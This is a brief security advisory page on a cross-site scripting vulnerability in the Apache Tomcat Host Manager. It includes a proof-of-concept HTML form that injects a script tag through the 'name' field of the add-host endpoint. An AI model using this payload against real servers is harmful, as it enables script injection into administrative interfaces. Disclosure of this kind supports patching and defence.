Apache Tomcat Host Manager Cross Site Scripting Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept is available:

<form action="http://localhost:8080/host-manager/html/add" method="get">
<INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">
<INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">
<input type="submit">
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus